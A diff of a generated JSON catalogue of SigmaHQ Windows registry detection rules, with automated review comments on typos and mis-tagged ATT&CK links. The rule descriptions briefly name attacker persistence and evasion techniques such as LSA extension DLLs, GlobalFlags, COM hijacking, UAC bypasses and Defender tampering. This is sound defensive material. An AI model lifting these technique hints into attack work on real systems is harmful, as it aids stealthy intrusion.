- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN",
- "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.012"
- ]
- },
- "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6",
- "value": "Suspicious Values In App Paths Default Property"
- },
 {
 "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.",
 "meta": {
@@ -13295,8 +16672,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml"
 ],
 "tags": [
@@ -13304,6 +16681,15 @@
 "attack.t1564.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec",
 "value": "Registry Persitence via Service in Safe Mode"
 },
@@ -13320,8 +16706,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
 "https://labs.f-secure.com/blog/scheduled-task-tampering/",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml"
 ],
 "tags": [
@@ -13330,24 +16716,33 @@
 "attack.t1053.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d",
 "value": "Scheduled TaskCache Change by Uncommon Program"
 },
 {
- "description": "Adds a RUN key that contains a powershell keyword",
+ "description": "Detects potential PowerShell commands or code within registry run keys",
 "meta": {
 "author": "frack113, Florian Roth",
 "creation_date": "2022/03/17",
 "falsepositive": [
- "Legitimate admin or third party scripts"
+ "Legitimate admin or third party scripts. Baseline according to your environnement"
 ],
 "filename": "registry_set_powershell_in_run_keys.yml",
 "level": "medium",
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry",
 "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
+ "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml"
 ],
 "tags": [
@@ -13356,7 +16751,7 @@
 ]
 },
 "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c",
- "value": "Powershell in Windows Run Keys"
+ "value": "Suspicious Powershell In Registry Run Keys"
 },
 {
 "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder",
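Review bot: The new `falsepositive` entry in the `@@ -13330` hunk, `"Legitimate admin or third party scripts. Baseline according to your environnement"`, carries a typo ("environnement"). The `filename` and SigmaHQ `refs` fields suggest this file is generated from the upstream Sigma rules, so the correction belongs in `registry_set_powershell_in_run_keys.yml` followed by a regeneration rather than a hand edit here, which the next generation would revert. The context line `"Registry Persitence via Service in Safe Mode"` in the `@@ -13304` hunk has the same kind of upstream typo and is not touched by this commit.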
@@ -13382,6 +16777,43 @@
 "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11",
 "value": "Registry Persistence via Explorer Run Key"
 },
+ {
+ "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys",
+ "meta": {
+ "author": "Karneades, Jonhnathan Ribeiro, Florian Roth",
+ "creation_date": "2018/04/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_persistence_globalflags.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
+ "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.t1546.012",
+ "car.2013-01-002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "36803969-5421-41ec-b92f-8500f79c23b0",
+ "value": "Potential Persistence Via GlobalFlags"
+ },
 {
 "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n",
 "meta": {
@@ -13395,8 +16827,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
 "https://persistence-info.github.io/Data/diskcleanuphandler.html",
+ "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml"
 ],
 "tags": [
@@ -13427,7 +16859,41 @@
 ]
 },
 "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06",
- "value": "Persistence Via MyComputer Key and SubKeys"
+ "value": "Potential Persistence Via MyComputer Registry Keys"
+ },
+ {
+ "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/30",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_persistence_shim_databases.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_databases.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1546.011"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45",
+ "value": "Potential Persistence Via Shim Database Modification"
 },
 {
 "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder",
@@ -13474,6 +16940,15 @@
 "attack.t1202"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc",
 "value": "Custom File Open Handler Executes PowerShell"
 },
@@ -13538,8 +17013,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
+ "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml"
 ],
 "tags": [
@@ -13547,6 +17022,15 @@
 "attack.t1137"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a",
 "value": "Change Outlook Security Setting in Registry"
 },
@@ -13565,9 +17049,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml"
 ],
 "tags": [
@@ -13600,32 +17084,50 @@
 "attack.t1562"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "90f342e1-1aaa-4e43-b092-39fda57ed11e",
 "value": "ETW Logging Disabled For rpcrt4.dll"
 },
 {
- "description": "Detects when a new custom protocole handler is registered",
+ "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute",
 "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/05/30",
+ "author": "frack113",
+ "creation_date": "2022/08/20",
 "falsepositive": [
- "Legitimate applications registering a new custom protocol handler"
+ "Legitimate use of the dll."
 ],
- "filename": "registry_set_register_custom_protocol_handler.yml",
+ "filename": "registry_set_persistence_scrobj_dll.yml",
 "level": "medium",
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml"
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml"
 ],
 "tags": [
- "attack.defense_evasion",
- "attack.t1112"
+ "attack.persistence",
+ "attack.t1546.015"
 ]
 },
- "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085",
- "value": "Newly Registered Protocol Handler"
+ "related": [
+ {
+ "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90",
+ "value": "Potential Persistence Via Scrobj.dll COM Hijacking"
 },
 {
 "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine",
@@ -13651,30 +17153,6 @@
 "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b",
 "value": "Allow RDP Remote Assistance Feature"
 },
- {
- "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_natural_language_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://persistence-info.github.io/Data/naturallanguage6.html",
- "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_natural_language_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8",
- "value": "Add DLLPathOverride Entry For Persistence"
- },
 {
 "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n",
 "meta": {
@@ -13688,13 +17166,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
- "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
 "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
 "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
+ "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
+ "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml"
 ],
 "tags": [
@@ -13727,33 +17205,18 @@
 "attack.t1547.010"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e",
 "value": "Add Port Monitor Persistence in Registry"
 },
- {
- "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "registry_set_lsa_extension_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/0gtweet/status/1476286368385019906",
- "https://persistence-info.github.io/Data/lsaaextension.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36",
- "value": "Persistence Via LSA Extensions"
- },
 {
 "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
 "meta": {
@@ -13769,8 +17232,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml"
 ],
 "tags": [
@@ -13796,8 +17259,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml"
 ],
 "tags": [
@@ -13854,6 +17317,15 @@
 "attack.t1221"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3",
 "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)"
 },
@@ -13871,7 +17343,6 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/",
- "https://attack.mitre.org/techniques/T1546/015/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml"
 ],
 "tags": [
@@ -13879,8 +17350,17 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "value": "Windows Registry Persistence COM Search Order Hijacking" + "value": "Potential Persistence Via COM Search Order Hijacking" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", @@ -13904,6 +17384,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" }, @@ -13929,6 +17418,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "value": "UAC Bypass Using Windows Media Player - Registry" }, @@ -13954,7 +17452,7 @@ ] }, "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", - "value": "Modify Attachment Manager Settings - Attachments" + "value": "Potential Attachment Manager Settings Attachments Tamper" }, { "description": "Detects the Setting of Windows Defender Exclusions", @@ -14003,6 +17501,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", "value": "Change Winevt Event Access Permission Via Registry" }, 
@@ -14021,8 +17528,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml"
 ],
 "tags": [
@@ -14078,9 +17585,42 @@
 "attack.t1562.004"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0",
 "value": "Disable Windows Firewall by Registry"
 },
+ {
+ "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/05/30",
+ "falsepositive": [
+ "Legitimate applications registering a new custom protocol handler"
+ ],
+ "filename": "registry_set_persistence_custom_protocol_handler.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085",
+ "value": "Potential Persistence Via Custom Protocol Handler"
+ },
 {
 "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen",
 "meta": {
@@ -14102,6 +17642,15 @@
 "attack.t1564.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a",
 "value": "User Account Hidden By Registry"
 },
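Review bot: The new `Potential Persistence Via Custom Protocol Handler` entry carries a technique tag (`attack.t1112`) but no `related` block, while the pre-existing entries in these hunks that carry a technique tag all gain one; either T1112 is absent from the tag-to-UUID mapping or newly added rules go through a different code path, and the `Modification of IE Registry Settings` entry added on a later line (also `attack.t1112`, also without `related`) shows the same gap. Worth confirming which it is before relying on `related` for coverage queries. The description also mirrors upstream typos (`protocole`, `And attacker` for `An attacker`) from the SigmaHQ rule; they belong to the upstream file and would flow in on the next regeneration rather than being patched here.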
@@ -14127,6 +17676,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", "value": "Blue Mockingbird - Registry" }, @@ -14175,6 +17733,15 @@ "attack.t1547.010" ] }, + "related": [ + { + "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", "value": "Changing RDP Port to Non Standard Number" }, @@ -14191,10 +17758,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], "tags": [ 
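Review bot: The `related` link added for `Changing RDP Port to Non Standard Number` points at `43881e51-ac74-445b-b4c6-f9f9e9bf23fe` only because the entry is tagged `attack.t1547.010` (Port Monitors), which does not describe an RDP port change; the mapping is mechanical, so an upstream tagging mistake becomes a `related-to` relation marked `almost-certain`. The same applies to `Bypass UAC Using Event Viewer` on a later line (also `attack.t1547.010`) and to `New Root or CA or AuthRoot Certificate to Store`, which inherits `f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a` from `attack.t1490` (Inhibit System Recovery). The tag lines are unchanged context here, so the correction belongs in the upstream rules; on the generator side, a lower likelihood value for tag-derived links, or a short note in the galaxy description that these relations are derived from rule tags, would keep them from reading as curated facts.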
@@ -14218,8 +17785,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" ], "tags": [ @@ -14227,6 +17794,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d223b46b-5621-4037-88fe-fda32eead684", "value": "New Root or CA or AuthRoot Certificate to Store" }, @@ -14243,8 +17819,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ @@ -14254,6 +17830,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", "value": "UAC Bypass via Sdclt" }, 
@@ -14270,8 +17855,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/hhctrl.html", "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://persistence-info.github.io/Data/hhctrl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" ], "tags": [ @@ -14302,6 +17887,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", "value": "Registry Disable System Restore" }, @@ -14326,6 +17920,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", "value": "Potential Registry Persistence Attempt Via Windows Telemetry" }, 
@@ -14353,11 +17956,34 @@
 "attack.t1546"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
